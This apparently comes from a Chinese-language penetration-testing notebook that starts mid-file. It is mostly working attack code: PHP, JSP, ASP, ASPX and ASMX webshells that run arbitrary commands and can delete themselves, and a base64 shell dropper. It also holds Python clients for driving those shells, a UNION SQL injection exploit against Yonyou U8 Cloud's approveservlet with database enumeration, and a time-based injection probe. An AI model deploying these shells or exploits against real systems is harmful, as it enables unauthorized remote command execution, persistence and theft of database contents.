        $p = @proc_open($cmdLine, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
        while (!@feof($io[1])) {
            $result .= @fgets($io[1], 1024 * 1024);
        }
        while (!@feof($io[2])) {
            $result .= @fgets($io[2], 1024 * 1024);
        }
        @fclose($io[1]);
        @fclose($io[2]);
        @proc_close($p);
    } elseif (substr(__FILE__, 0, 1) != "/" && @class_exists("COM")) {
        $w = new COM('WScript.shell');
        $e = $w->exec($cmdLine);
        $so = $e->StdOut();
        $result .= $so->ReadAll();
        $se = $e->StdErr();
        $result .= $se->ReadAll();
    } elseif (function_existsEx("pcntl_fork") && function_existsEx("pcntl_exec")) {
        $cmd = "/bin/bash";
        if (!file_exists($cmd)) {
            $cmd = "/bin/sh";
        }
        $commandFile = sys_get_temp_dir() . "/" . time() . ".log";
        $resultFile = sys_get_temp_dir() . "/" . (time() + 1) . ".log";
        @file_put_contents($commandFile, $cmdLine);
        switch (pcntl_fork()) {
            case 0:
                $args = array("-c", "$cmdLine > $resultFile");
                pcntl_exec($cmd, $args);
                exit(0);
            default:
                break;
        }
        if (!file_exists($resultFile)) {
            sleep(2);
        }
        $result = file_get_contents($resultFile);
        @unlink($commandFile);
        @unlink($resultFile);
    } elseif (($result = runshellshock(__FILE__, $cmdLine) !== false)) {

    } else {
        return "none of proc_open/passthru/shell_exec/exec/exec/popen/COM/runshellshock/pcntl_exec is available";
    }
    $result .= @ob_get_contents();
    @ob_end_clean();
    return $result;
}

if (!empty($_REQUEST['command'])) {
    if ($_REQUEST['command'] === 'delete') {
        unlink(__FILE__);
    }
    echo execCommand($_REQUEST["command"]);
} else {
    header("Location: /");
    exit;
}
?>

重新写一个命令执行的小马,对于一些限制上传种有 system 这种函数的简单绕过

<?php file_put_contents("shell_name", base64_decode("shell_base64_content"));unlink(__FILE__);?>

JSP

<%@ page import="java.io.*" %>
<%
    String command = request.getParameter("command");
    if (command != null) {
        if (command.equals("delete")) {
            (new File(application.getRealPath(request.getServletPath()))).delete();
        } else {
            boolean isLinux = true;
            String osTyp = System.getProperty("os.name");
            if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                isLinux = false;
            }
            String[] cmds = isLinux ? new String[]{"sh", "-c", command} : new String[]{"cmd.exe", "/c", command};

            try {
                Process process = Runtime.getRuntime().exec(cmds);
                BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
                String line;
                while ((line = reader.readLine()) != null) {
                    out.println(line);
                }
                reader.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
%>

ASP

<%
Function ExecuteCommand(command)
    Dim objShell, objExec, strOutput
    Set objShell = Server.CreateObject("WScript.Shell")
    Set objExec = objShell.Exec("cmd.exe /c " & command)
    strOutput = objExec.StdOut.ReadAll()
    Set objExec = Nothing
    Set objShell = Nothing
    If Len(strOutput) > 0 Then
        ExecuteCommand = strOutput
    Else
        ExecuteCommand = ""
    End If
End Function


Dim command
command = Request.QueryString("command")
Dim output
output = ExecuteCommand(command)


If Len(output) > 0 And Len(command) > 0 Then
    Response.Write(output)
End If
%>


On Error Resume Next  ' 开启错误处理

Dim fs, file
Dim currentScriptName
Dim filePath
currentScriptName = Request.ServerVariables("Script_Name")
filePath = Server.MapPath(currentScriptName)

Response.Write("File path: " & filePath & "<br>")

Set fs = Server.CreateObject("Scripting.FileSystemObject")
fs.DeleteFile(filePath)

If Err.Number <> 0 Then
    Response.Write("Error: " & Err.Description)
    Err.Clear
End If

Set fs = Nothing  ' 清理对象

ASPX

<%@ Page Language="C#" %>
<!DOCTYPE html>
<html>
<body>
    <form id="form1" runat="server">
        <div>
            <asp:Label ID="lblOutput" runat="server" Text=""></asp:Label>
        </div>
    </form>
</body>
</html>

<script runat="server">
protected void Page_Load(object sender, EventArgs e)
{
    if (!IsPostBack)
    {
        string command = Request.QueryString["command"];
        if (string.Equals(command, "delete", StringComparison.OrdinalIgnoreCase))
        {
            System.IO.File.Delete(Request.PhysicalPath);
        }
        if (!string.IsNullOrEmpty(command))
        {
            ExecuteCommandAndDisplayOutput(command);
        }
    }
}

private void ExecuteCommandAndDisplayOutput(string command)
{
    try
    {
        System.Diagnostics.Process process = new System.Diagnostics.Process();
        process.StartInfo.FileName = "cmd.exe";
        process.StartInfo.Arguments = "/C " + command;
        process.StartInfo.RedirectStandardOutput = true;
        process.StartInfo.UseShellExecute = false;
        process.StartInfo.CreateNoWindow = true;
        process.Start();
        string output = process.StandardOutput.ReadToEnd();
        process.WaitForExit();
        lblOutput.Text = "<pre>" + Server.HtmlEncode(output) + "</pre>";
    }
    catch (Exception ex)
    {
        lblOutput.Text = "<pre>Error: " + Server.HtmlEncode(ex.Message) + "</pre>";
    }
}
</script>

提取结果的脚本

def exec(self, command):
    """
    Send ``command`` to ``self.shell_url`` and return the text of the first ``<pre>`` element.

    The command is passed as the ``command`` query-string parameter. Only the
    contents of the ``<pre>`` tag are returned, so the surrounding page markup
    never leaks into the result.

    :param command: value sent as the ``command`` query parameter
    :return: ``<pre>`` text with trailing newlines removed, or '' when the
             status is not 200, no ``<pre>`` is present, or any error occurs
    """
    try:
        response = requests.get(self.shell_url, params={'command': command}, verify=False)
        if response.status_code == 200:
            pre_tag = BeautifulSoup(response.content, 'html.parser').find('pre')
            if pre_tag:
                output = pre_tag.get_text().rstrip('\n')
                logger.info("{} => {} => {}".format(self.url, command, output))
                return output
    except Exception:
        # Best effort: any request or parsing failure is reported as "no output".
        pass
    return ''

ASMX

<%@ WebService Language="C#" Class="WebService1" %>

using System;
using System.IO;
using System.Diagnostics;
using System.Web;
using System.Web.Services;

[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
public class WebService1 : System.Web.Services.WebService
{
    public WebService1()
    {
        //
        // TODO: Add any constructor code required
        //
    }

    [WebMethod]
    public string Cmdshell(string command)
    {
        if (command == "deleteSelf")
        {
            string filePath = System.Reflection.Assembly.GetExecutingAssembly().Location;
            ProcessStartInfo psi = new ProcessStartInfo("cmd.exe", $"/C timeout /T 2 /NOBREAK & Del /F \"{filePath}\"");
            psi.WindowStyle = ProcessWindowStyle.Hidden;
            psi.CreateNoWindow = true;
            Process.Start(psi);
            System.Web.HttpContext.Current.ApplicationInstance.CompleteRequest();
            return "Web service will be deleted immediately.";
        }
        Process oci = new Process();
        oci.StartInfo.FileName = "cmd.exe";
        oci.StartInfo.RedirectStandardOutput = true;
        oci.StartInfo.UseShellExecute = false;
        oci.StartInfo.Arguments = "/c " + command;
        oci.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
        oci.Start();
        StreamReader txt = oci.StandardOutput;
        string alltxt = txt.ReadToEnd();
        txt.Close();
        txt.Dispose();
        oci.Dispose();
        return alltxt;
    }
}
def exec(self, param):
    """
    POST ``param`` to the ``Cmdshell`` web method and return the extracted ``<string>`` payload.

    :param param: value sent as the ``command`` form field
    :return: whatever ``get_re_str`` extracts from the response body, or ''
             when any exception is raised
    """
    try:
        # NOTE(review): ``shell_name`` is not defined inside this block; it is
        # presumably a module-level name - confirm, otherwise the NameError is
        # swallowed below and '' is always returned.
        endpoint = f"{self.url.rstrip('/')}/spool/1/{shell_name}.asmx/Cmdshell"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36",
            "Accept-Encoding": "gzip, deflate, br",
            "Accept": "*/*",
            "Connection": "close",
            "Content-Type": "application/x-www-form-urlencoded",
            "SOAPAction": "\"http://tempuri.org/UploadData\"",
        }
        form_fields = {"command": param}
        # NOTE(review): unlike the other request helpers in this file, no
        # ``verify=False`` and no ``timeout`` are passed here - confirm intent.
        response = requests.post(url, headers=request_headers, data=form_fields) if False else requests.post(endpoint, headers=request_headers, data=form_fields)
        # NOTE(review): ``get_re_str`` is defined elsewhere; ``(.*)`` will not span
        # line breaks unless that helper compiles the pattern with DOTALL - verify.
        extracted = get_re_str(r'<string xmlns="http://tempuri.org/">(.*)</string>', response.text)
        logger.info(f'target {self.url} => {param} => {extracted}')
        return extracted
    except Exception:
        # Best effort: every failure is reported as an empty result.
        pass
    return ''

SQL注入

有回显

漏洞检测

通过输出特殊字符串或者 MD5 来判断( 和命令执行相同 )

image-20240826180418782

写一个 exec_sql 用于执行给定的 SQL 语句。

漏洞利用

  1. 插入后台用户 GetShell => CVE-2024-27956 WP-Automatic Plugin SQL 注入漏洞( 插入管理员账号,登录上传带有 shell 的插件 )
  2. 正常的获取数据库结构
  3. 有返回长度限制的,一个一个查 => Saber 企业级开发平台 menu/list SQL注入
  4. 没有返回长度限制的,直接用 group_concat 一次性查出

示例

用友 U8 Cloud approveservlet SQL 注入漏洞

SQL Server 的数据库第一次遇到

UNION 联合注入类型:

def exec_sql(self, payload):
    try:
        url = self.url.rstrip('/') + '/service/approveservlet'
        headers = {
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        }
        data = {
            "BILLID": f"1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,({payload}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WPWZ",
            "BILLTYPE": "4331",
            "USERID": "3",
            "RESULT": "4",
            "DATASOURCE": "U8cloud"
        }
        res = requests.post(url, data=data, headers=headers, verify=False)
        if '&apos;' in res.text:
            result = res.text.split('&apos;')[1].split('&apos;')[0]
            logger.info(
                {
                    'url': self.url,
                    'payload': payload,
                    'result': result,
                }
            )
            return result
    except Exception as e:
        pass
    return ''

数据库基本信息:

def get_db_base_info(self) -> dict:
    """
    Collect basic server facts by running a fixed list of scalar queries through ``self.exec_sql``.

    Queries are issued in a fixed order (version, servername, host_name,
    db_name, user_name). A key is only present in the result when its query
    returned a truthy value.

    :return: dict mapping fact name to the value returned by ``exec_sql``;
             if ``exec_sql`` raises, the facts gathered so far are returned
    """
    probes = (
        ("version", "select @@version"),
        ("servername", "select @@servername"),
        ("host_name", "select host_name()"),
        ("db_name", "select db_name()"),
        ("user_name", "select user_name()"),
    )
    collected = {}
    try:
        for key, query in probes:
            value = self.exec_sql(query)
            if value:
                collected[key] = value
    except Exception:
        # Best effort: stop at the first failure and keep what was gathered.
        pass
    return collected

数据库结构:

因为是 UNION 注入,查询结果只能通过单个字段回显;而目标 SQL Server 版本较低,不能使用拼接函数(如 STRING_AGG),所以通过 FOR XML PATH 将多行结果拼接为一个字符串。

def get_db_info(self) -> list:
    """
    Enumerate non-system databases, their user tables and each table's column names.

    Every lookup goes through ``self.exec_sql`` and is expected to come back as
    one ``', '``-separated string (rows are concatenated with ``FOR XML PATH``).
    Empty names are skipped, so a query that returns nothing does not trigger
    follow-up queries or produce a record with blank fields.

    :return: list of ``{"db_name", "table_name", "columns"}`` dicts, where
             ``columns`` is the raw comma-separated string returned by
             ``exec_sql`` (possibly ''); an empty list when nothing could be read
    """
    system_dbs = {'master', 'tempdb', 'model', 'msdb'}
    info = []
    try:
        database_str = self.exec_sql("SELECT STUFF((SELECT ', ' + name FROM sys.databases FOR XML PATH('')), 1, 2, '')")
        for db_name in (database_str or '').split(','):
            # strip() only removes the separator padding; inner spaces are kept.
            db_name = db_name.strip()
            if not db_name or db_name in system_dbs:
                continue
            table_names = self.exec_sql(f"""SELECT STUFF((SELECT TOP 100  ', ' + name FROM {db_name}.sys.tables WHERE type = 'U' AND is_ms_shipped = 0 FOR XML PATH('')), 1, 2, '')""")
            for table_name in (table_names or '').split(','):
                table_name = table_name.strip()
                if not table_name:
                    # ''.split(',') yields [''] - nothing to look up for this database.
                    continue
                col_str = self.exec_sql(f"""SELECT STUFF((SELECT TOP 100  ', ' + COLUMN_NAME FROM {db_name}.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '{table_name}' FOR XML PATH('')), 1, 2, '')""")
                info.append(
                    {"db_name": db_name, "table_name": table_name, "columns": col_str}
                )
    except Exception:
        # Deliberately best effort: return whatever was collected before the failure.
        pass
    return info

无回显

延时注入

def check(self):
    """
    Time-based check of ``/kp/PreviewKPQT.jsp`` using a ``WAITFOR DELAY`` probe.

    A baseline request is timed first. The same endpoint is then requested with
    a randomly chosen 20-30 second delay appended to the ``KPQTID`` parameter.
    The check passes only when the delayed response has status 200, contains
    the expected page marker, took longer than the delay, and the baseline was
    faster than the delay.

    :return: dict with the three timings on success, otherwise False
             (including when any request fails or times out)
    """
    try:
        base_url = self.url.rstrip('/') + "/kp/PreviewKPQT.jsp?KPQTID=1"
        # Baseline timing. The timeout keeps a stalled target from blocking forever.
        res = requests.get(base_url, verify=False, timeout=60)
        if res.status_code != 200:
            return False
        normal_elapsed = res.elapsed.total_seconds()
        # A random delay makes a coincidental slow response less likely to match.
        delay = random.randint(20, 30)
        url = base_url + "';WAITFOR DELAY '0:0:{}'--".format(delay)
        res = requests.get(url, verify=False, timeout=60)
        injected_elapsed = res.elapsed.total_seconds()
        # Required ordering: injected response > requested delay > normal response.
        if res.status_code == 200 and '填表日期' in res.text and injected_elapsed > delay > normal_elapsed:
            evidence = {
                '正常响应': f'{normal_elapsed}s',
                '等待时间': f'{delay}s',
                '注入响应': f'{injected_elapsed}s',
            }
            logger.info({'url': self.url, **evidence})
            return evidence
    except Exception:
        # Network errors and timeouts are treated as "not confirmed".
        pass
    return False